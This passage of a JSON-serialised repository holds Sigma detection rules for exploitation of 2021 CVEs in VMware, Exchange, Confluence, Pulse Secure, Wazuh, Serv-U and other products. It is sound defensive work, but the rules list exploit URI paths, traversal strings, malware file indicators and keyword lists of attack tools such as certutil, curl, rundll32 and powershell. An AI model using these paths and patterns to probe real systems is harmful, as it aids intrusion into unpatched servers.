    "content": "title: CVE-2021-21972 VSphere Exploitation\nid: 179ed852-0f9b-4009-93a7-68475910fd86\nstatus: test\ndescription: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972\nreferences:\n    - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n    - https://f5.pm/go-59627.html\n    - https://swarm.ptsecurity.com/unauth-rce-vmware\nauthor: Bhabesh Raj\ndate: 2021-02-24\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-21972\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query: '/ui/vropspluginui/rest/services/uploadova'\n    condition: selection\nfalsepositives:\n    - OVA uploads to your VSphere appliance\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-21978/web_cve_2021_21978_vmware_view_planner_exploit.yml",
    "content": "title: CVE-2021-21978 Exploitation Attempt\nid: 77586a7f-7ea4-4c41-b19c-820140b84ca9\nstatus: test\ndescription: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978\nreferences:\n    - https://twitter.com/wugeej/status/1369476795255320580\n    - https://paper.seebug.org/1495/\nauthor: Bhabesh Raj\ndate: 2020-03-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-21978\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - 'logupload'\n            - 'logMetaData'\n            - 'wsgi_log_upload.py'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-22005/web_cve_2021_22005_vmware_file_upload.yml",
    "content": "title: VMware vCenter Server File Upload CVE-2021-22005\nid: b014ea07-8ea0-4859-b517-50a4e5b7ecec\nstatus: test\ndescription: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.\nreferences:\n    - https://kb.vmware.com/s/article/85717\n    - https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server\nauthor: Sittikorn S\ndate: 2021-09-24\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-22005\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/analytics/telemetry/ph/api/hyper/send?'\n    condition: selection\nfalsepositives:\n    - Vulnerability Scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-22123/web_cve_2021_22123_fortinet_exploit.yml",
    "content": "title: Fortinet CVE-2021-22123 Exploitation\nid: f425637f-891c-4191-a6c4-3bb1b70513b4\nstatus: test\ndescription: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs\nreferences:\n    - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection\nauthor: Bhabesh Raj, Florian Roth\ndate: 2021-08-19\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-22123\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/api/v2.0/user/remoteserver.saml'\n        cs-method: POST\n    filter1:\n        cs-referer|contains: '/root/user/remote-user/saml-user/'\n    filter2:\n        cs-referer: null\n    condition: selection and not filter1 and not filter2\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-22893/web_cve_2021_22893_pulse_secure_rce_exploit.yml",
    "content": "title: Pulse Connect Secure RCE Attack CVE-2021-22893\nid: 5525edac-f599-4bfd-b926-3fa69860e766\nstatus: stable\ndescription: This rule detects exploitation attempts using the Pulse Connect Secure (PCS) vulnerability CVE-2021-22893\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html\n    - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784\nauthor: Sittikorn S\ndate: 2021-06-29\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-22893\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains:\n            - '/dana-na/auth/'\n            - '/dana-ws/'\n            - '/dana-cached/'\n    selection2:\n        cs-uri-query|contains:\n            - '?id='\n            - '?token='\n            - 'Secid_canceltoken.cgi'\n            - 'CGI::param'\n            - 'meeting'\n            - 'smb'\n            - 'namedusers'\n            - 'metric'\n    condition: all of selection*\nfalsepositives:\n    - Vulnerability Scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26084/proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml",
    "content": "title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt\nid: 245f92e3-c4da-45f1-9070-bc552e06db11\nstatus: test\ndescription: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-26084\n    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n    - https://github.com/h3v0x/CVE-2021-26084_Confluence\nauthor: Bhabesh Raj\ndate: 2021-09-08\nmodified: 2023-02-13\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1190\n    - attack.t1059\n    - cve.2021-26084\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Monitor suspicious child processes spawned by Confluence\n        ParentImage|endswith: '\\Atlassian\\Confluence\\jre\\bin\\java.exe'\n        CommandLine|contains:\n            - 'certutil'\n            - 'cmd /c'\n            - 'cmd /k'\n            - 'cscript'\n            - 'curl'\n            - 'ipconfig'\n            - 'powershell'\n            - 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'whoami'\n            - 'wscript'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26084/web_cve_2021_26084_confluence_rce_exploit.yml",
    "content": "title: Potential CVE-2021-26084 Exploitation Attempt\nid: 38825179-3c78-4fed-b222-2e2166b926b1\nstatus: test\ndescription: Detects potential exploitation of CVE-2021-26084, a Confluence RCE using OGNL injection\nreferences:\n    - https://github.com/TesterCC/exp_poc_library/blob/be61622600ec79d8fba2fa5f816a870715f0cb3b/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md\n    - https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md\n    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n    - https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/\nauthor: Sittikorn S, Nuttakorn T\ndate: 2022-12-13\nmodified: 2023-03-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-26084\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Requirements: The POST request body data must be collected in order to make use of certain parts of this detection'\ndetection:\n    selection_main:\n        cs-method: 'POST'\n        sc-status: 200\n        cs-username: 'anonymous' # This string is used to reduce possible FPs; remove it to also catch authenticated attempts\n    selection_exploit_1:\n        cs-uri-query|contains|all:\n            - '/pages/createpage-entervariables.action'\n            - 'SpaceKey=x' # This URI assumes that you don't have a space key of \"x\"\n    selection_exploit_2_uri:\n        cs-uri-query|contains: '/doenterpagevariables.action'\n    selection_exploit_2_keyword:\n        - 'u0027' # This string should appear in the POST body as a value of the parameter \"queryString\"\n    condition: selection_main and (selection_exploit_1 or all of selection_exploit_2_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26814/web_cve_2021_26814_wzuh_rce.yml",
    "content": "title: Exploitation of CVE-2021-26814 in Wazuh\nid: b9888738-29ed-4c54-96a4-f38c57b84bb3\nstatus: test\ndescription: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814\nreferences:\n    - https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-22\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-21978\n    - cve.2021-26814\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/manager/files?path=etc/lists/../../../../..'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml",
    "content": "title: Potential CVE-2021-26857 Exploitation Attempt\nid: cd479ccc-d8f0-4c66-ba7d-e06286f3f887\nstatus: stable\ndescription: Detects possible successful exploitation of the vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawned by Exchange Server's Unified Messaging service\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nauthor: Bhabesh Raj\ndate: 2021-03-03\nmodified: 2023-02-07\ntags:\n    - attack.t1203\n    - attack.execution\n    - cve.2021-26857\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\UMWorkerProcess.exe'\n    filter:\n        Image|endswith:\n            - 'wermgr.exe'\n            - 'WerFault.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml",
    "content": "title: CVE-2021-26858 Exchange Exploitation\nid: b06335b3-55ac-4b41-937e-16b7f5d57dfd\nstatus: test\ndescription: |\n    Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for\n    creation of non-standard files on disk by Exchange Server’s Unified Messaging service\n    which could indicate dropping web shells or other malicious content\nreferences:\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nauthor: Bhabesh Raj\ndate: 2021-03-03\nmodified: 2022-10-09\ntags:\n    - attack.t1203\n    - attack.execution\n    - cve.2021-26858\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: 'UMWorkerProcess.exe'\n    filter:\n        TargetFilename|endswith:\n            - 'CacheCleanup.bin'\n            - '.txt'\n            - '.LOG'\n            - '.cfg'\n            - 'cleanup.bin'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-26858/web_cve_2021_26858_iis_rce.yml",
    "content": "title: ProxyLogon Reset Virtual Directories Based On IIS Log\nid: effee1f6-a932-4297-a81f-acb44064fa3a\nstatus: test\ndescription: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories\nreferences:\n    - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c\nauthor: frack113\ndate: 2021-08-10\nmodified: 2023-05-08\ntags:\n    - cve.2021-26858\n    - detection.emerging-threats\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\n    definition: 'Requirements: The POST request body data must be collected in order to make use of this detection'\ndetection:\n    selection:\n        cs-method: 'POST'\n        sc-status: 200\n        cs-uri-stem: '/ecp/DDI/DDIService.svc/SetObject'\n        cs-uri-query|contains|all:\n            - 'schema=Reset'\n            - 'VirtualDirectory'\n        cs-username|endswith: '$'\n    keywords:\n        '|all':\n            - 'POST'\n            - 200\n            - '/ecp/DDI/DDIService.svc/SetObject'\n            - 'schema=Reset'\n            - 'VirtualDirectory'\n            - '$'\n    condition: selection or keywords\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-27905/web_cve_2021_27905_apache_solr_exploit.yml",
    "content": "title: Potential CVE-2021-27905 Exploitation Attempt\nid: 0bbcd74b-0596-41a4-94a0-4e88a76ffdb3\nstatus: test\ndescription: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.\nreferences:\n    - https://twitter.com/Al1ex4/status/1382981479727128580\n    - https://twitter.com/sec715/status/1373472323538362371\n    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/\n    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186\n    - https://github.com/murataydemir/CVE-2021-27905\nauthor: '@gott_cyber'\ndate: 2022-12-11\nmodified: 2023-03-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-27905\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_request1:\n        cs-uri-query|contains|all:\n            - '/solr/'\n            - '/debug/dump?'\n            - 'param=ContentStream'\n        sc-status: 200\n    selection_request2:\n        cs-method: 'GET'\n        cs-uri-query|contains|all:\n            - '/solr/'\n            - 'command=fetchindex'\n            - 'masterUrl='\n        sc-status: 200\n    condition: 1 of selection_*\nfalsepositives:\n    - Vulnerability Scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-28480/web_cve_2021_28480_exchange_exploit.yml",
    "content": "title: Exchange Exploitation CVE-2021-28480\nid: a2a9d722-0acb-4096-bccc-daaf91a5037b\nstatus: test\ndescription: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480\nreferences:\n    - https://twitter.com/GossiTheDog/status/1392965209132871683?s=20\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-14\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-28480\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/owa/calendar/a'\n        cs-method: 'POST'\n    filter_main_status:\n        sc-status: 503\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-33766/web_cve_2021_33766_msexchange_proxytoken.yml",
    "content": "title: CVE-2021-33766 Exchange ProxyToken Exploitation\nid: 56973b50-3382-4b56-bdf5-f51a3183797a\nstatus: test\ndescription: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766\nreferences:\n    - https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server\nauthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-33766\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_1:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/ecp/'\n            - '/RulesEditor/InboxRules.svc/NewObject'\n        sc-status: 500\n    selection_2:\n        cs-uri-query|contains|all:\n            - 'SecurityToken='\n            - '/ecp/'\n        sc-status: 500\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-33771/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml",
    "content": "title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum\nid: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef\nstatus: test\ndescription: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n    - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/\nauthor: Sittikorn S\ndate: 2021-07-16\nmodified: 2022-10-09\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.credential-access\n    - attack.t1566\n    - attack.t1203\n    - cve.2021-33771\n    - cve.2021-31979\n    - detection.emerging-threats\n    # - threat_group.Sourgum\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - 'C:\\Windows\\system32\\physmem.sys'\n            - 'C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll'\n            - 'C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL'\n            - 'C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll'\n            - 'C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat'\n            - 'C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat'\n            - 'C:\\Windows\\system32\\config\\config\\startwus.dat'\n            - 'C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini'\n            - 'C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini'\n            - 'C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-33771/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml",
    "content": "title: CVE-2021-31979 CVE-2021-33771 Exploits\nid: 32b5db62-cb5f-4266-9639-0fa48376ac00\nstatus: test\ndescription: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n    - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/\nauthor: Sittikorn S, frack113\ndate: 2021-07-16\nmodified: 2023-08-17\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.credential-access\n    - attack.t1566\n    - attack.t1203\n    - cve.2021-33771\n    - cve.2021-31979\n    - detection.emerging-threats\n    # - threat_group.Sourgum\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith:\n            - CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)\n            - CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)\n    filter:\n        Details|endswith:\n            - system32\\wbem\\wmiutils.dll\n            - system32\\wbem\\wbemsvc.dll\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml",
    "content": "title: Serv-U Exploitation CVE-2021-35211 by DEV-0322\nid: 75578840-9526-4b2a-9462-af469a45e767\nstatus: test\ndescription: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-14\nmodified: 2022-12-18\ntags:\n    - attack.persistence\n    - attack.t1136.001\n    - cve.2021-35211\n    - detection.emerging-threats\n    # - threat_group.DEV-0322\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_whoami:\n        CommandLine|contains: 'whoami'\n    selection_cmd_1:\n        CommandLine|contains:\n            - './Client/Common/'\n            - '.\\Client\\Common\\'\n    selection_cmd_2:\n        CommandLine|contains: 'C:\\Windows\\Temp\\Serv-U.bat'\n    condition: selection_whoami and 1 of selection_cmd*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-38647/zeek_http_exploit_cve_2021_38647_omigod_no_auth_rce.yml",
    "content": "title: OMIGOD HTTP No Authentication RCE - CVE-2021-38647\nid: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b\nstatus: stable\ndescription: |\n    Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote code execution (RCE) as root with just a single unauthenticated HTTP request.\n    Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\n    Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://twitter.com/neu5ron/status/1438987292971053057?s=20\nauthor: Nate Guagenti (neu5ron)\ndate: 2021-09-20\nmodified: 2025-11-03\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\n    - attack.t1021.006\n    - attack.t1210\n    - detection.emerging-threats\n    - cve.2021-38647\nlogsource:\n    product: zeek\n    service: http\n    definition: Enable the built-in Zeek script that logs all HTTP header names by adding \"@load policy/protocols/http/header-names\" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/d957f883df242ef159cfd846884e673addeea7a5/scripts/policy/protocols/http/header-names.zeek\ndetection:\n    selection:\n        status_code: 200\n        uri: /wsman\n        method: POST\n    auth_header:\n        client_header_names|contains: 'AUTHORIZATION'\n    too_small_http_client_body:\n        request_body_len: 0\n    # winrm_ports:\n    #    id.resp_p:\n    #        -  5985\n    #        -  5986\n    #        -  1270\n    condition: selection and not auth_header and not too_small_http_client_body\n    # condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule\nfalsepositives:\n    - Exploits that were attempted but unsuccessful.\n    - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-4034/lnx_auth_exploit_cve_2021_4034_pwnkit_lpe.yml",
    "content": "title: PwnKit Local Privilege Escalation\nid: 0506a799-698b-43b4-85a1-ac4c84c720e9\nstatus: test\ndescription: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs\nreferences:\n    - https://twitter.com/wdormann/status/1486161836961579020\nauthor: Sreeman\ndate: 2022-01-26\nmodified: 2024-09-11\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.001\n    - detection.emerging-threats\n    - cve.2021-4034\nlogsource:\n    product: linux\n    service: auth\ndetection:\n    keywords:\n        '|all':\n            - 'pkexec'\n            - 'The value for environment variable XAUTHORITY contains suspicious content'\n            - '[USER=root] [TTY=/dev/pts/0]'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml",
    "content": "title: Suspicious Word Cab File Write CVE-2021-40444\nid: 60c0a111-787a-4e8a-9262-ee485f3ef9d5\nstatus: test\ndescription: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444\nreferences:\n    - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20\n    - https://twitter.com/vanitasnk/status/1437329511142420483?s=21\nauthor: Florian Roth (Nextron Systems), Sittikorn S\ndate: 2021-09-10\nmodified: 2023-06-22\ntags:\n    - attack.resource-development\n    - attack.t1587\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_cab:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains: '\\Windows\\INetCache'\n        TargetFilename|endswith: '.cab'\n    selection_inf:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '.inf'\n    filter_main_legit:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: 'AppData\\Local\\Temp'\n        TargetFilename|endswith: '\\Content.inf'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml",
    "content": "title: Potential CVE-2021-40444 Exploitation Attempt\nid: 894397c6-da03-425c-a589-3d09e7d1f750\nstatus: test\ndescription: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\n    - https://twitter.com/neonprimetime/status/1435584010202255375\n    - https://www.joesandbox.com/analysis/476188/1/iochtml\nauthor: Florian Roth (Nextron Systems), @neonprimetime\ndate: 2021-09-08\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.t1059\n    - cve.2021-40444\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\control.exe'\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\powerpnt.exe'\n            - '\\excel.exe'\n    filter:\n        CommandLine|endswith:\n            - '\\control.exe input.dll'\n            - '\\control.exe\" input.dll'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml",
    "content": "title: Potential Exploitation Attempt From Office Application\nid: 868955d9-697e-45d4-a3da-360cefd7c216\nstatus: test\ndescription: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)\nreferences:\n    - https://twitter.com/sbousseaden/status/1531653369546301440\n    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\nauthor: Christian Burkard (Nextron Systems), @SBousseaden (idea)\ndate: 2022-06-02\nmodified: 2023-02-04\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - cve.2021-40444\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\eqnedt32.exe'\n            - '\\visio.exe'\n        CommandLine|contains:\n            - '../../../..'\n            - '..\\..\\..\\..'\n            - '..//..//..//..'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40539/web_cve_2021_40539_adselfservice.yml",
    "content": "title: ADSelfService Exploitation\nid: 6702b13c-e421-44cc-ab33-42cc25570f11\nstatus: test\ndescription: Detects suspicious access to URLs that was noticed in cases in which attackers exploited the ADSelfService vulnerability CVE-2021-40539\nreferences:\n    - https://us-cert.cisa.gov/ncas/alerts/aa21-259a\nauthor: Tobias Michalski (Nextron Systems), Max Altgelt (Nextron Systems)\ndate: 2021-09-20\nmodified: 2023-01-02\ntags:\n    - cve.2021-40539\n    - detection.emerging-threats\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/help/admin-guide/Reports/ReportGenerate.jsp'\n            - '/ServletApi/../RestApi/LogonCustomization'\n            - '/ServletApi/../RestAPI/Connection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-40539/web_cve_2021_40539_manageengine_adselfservice_exploit.yml",
    "content": "title: CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit\nid: fcbb4a77-f368-4945-b046-4499a1da69d1\nstatus: test\ndescription: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).\nreferences:\n    - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/\n    - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html\n    - https://us-cert.cisa.gov/ncas/alerts/aa21-259a\nauthor: Sittikorn S, Nuttakorn Tungpoonsup\ndate: 2021-09-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.persistence\n    - attack.t1505.003\n    - cve.2021-40539\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Logs must be collected from \\ManageEngine\\ADSelfService Plus\\logs'\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/help/admin-guide/Reports/ReportGenerate.jsp'\n            - '/RestAPI/LogonCustomization'\n            - '/RestAPI/Connection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml",
